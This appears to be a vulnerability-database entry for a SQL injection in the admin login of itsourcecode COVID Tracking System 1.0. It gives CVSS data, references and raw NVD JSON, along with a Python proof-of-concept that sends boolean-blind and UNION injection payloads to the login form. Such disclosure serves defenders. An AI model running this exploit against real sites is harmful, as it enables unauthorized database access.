CVE-2025-14584

Description

A vulnerability has been found in itsourcecode COVID Tracking System 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login. The manipulation of the argument Username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:covid_tracking_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode COVID Tracking System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14584 SQL Injection PoC
# Target: itsourcecode COVID Tracking System 1.0
# Endpoint: /admin/login.php
# Parameter: Username

def exploit_sqli(target_url, payload):
    """
    SQL Injection exploit for CVE-2025-14584
    payload: SQL injection payload to inject
    """
    login_url = f"{target_url}/admin/login.php"
    
    # Construct POST data with SQL injection payload
    data = {
        'Username': payload,
        'Password': 'anything',
        'btnlogin': 'Login'
    }
    
    try:
        response = requests.post(login_url, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def test_blind_sqli(target_url):
    """
    Test for blind boolean-based SQL injection
    """
    # Original payload - should return true
    true_payload = "admin' AND 1=1 -- -"
    # Modified payload - should return false
    false_payload = "admin' AND 1=2 -- -"
    
    print(f"[*] Testing blind SQL injection on {target_url}")
    
    resp_true = exploit_sqli(target_url, true_payload)
    resp_false = exploit_sqli(target_url, false_payload)
    
    if len(resp_true) != len(resp_false):
        print("[+] Blind SQL injection confirmed!")
        return True
    return False

def extract_db_version(target_url):
    """
    Extract database version using UNION-based injection
    """
    # Payload to extract database version
    payload = "' UNION SELECT NULL,version(),NULL,NULL,NULL -- -"
    
    print(f"[*] Extracting database version...")
    response = exploit_sqli(target_url, payload)
    return response

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://victim.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print(f"[*] CVE-2025-14584 SQL Injection PoC")
    print(f"[*] Target: {target}")
    
    # Test if vulnerable
    test_blind_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14584
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14584
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14584/
[4] VulDB https://vuldb.com/cve/CVE-2025-14584
[5] https://github.com/Wegetmore/CVE/issues/1
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.336204
[8] https://vuldb.com/?id.336204
[9] https://vuldb.com/?submit.705534

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14584", "sourceIdentifier": "[email protected]", "published": "2025-12-12T23:15:37.887", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in itsourcecode COVID Tracking System 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login. The manipulation of the argument Username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:covid_tracking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F9CA2A72-A364-4090-A959-6AA82D55A239"}]}]}], "references": [{"url": "https://github.com/Wegetmore/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.336204", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336204", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.705534", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}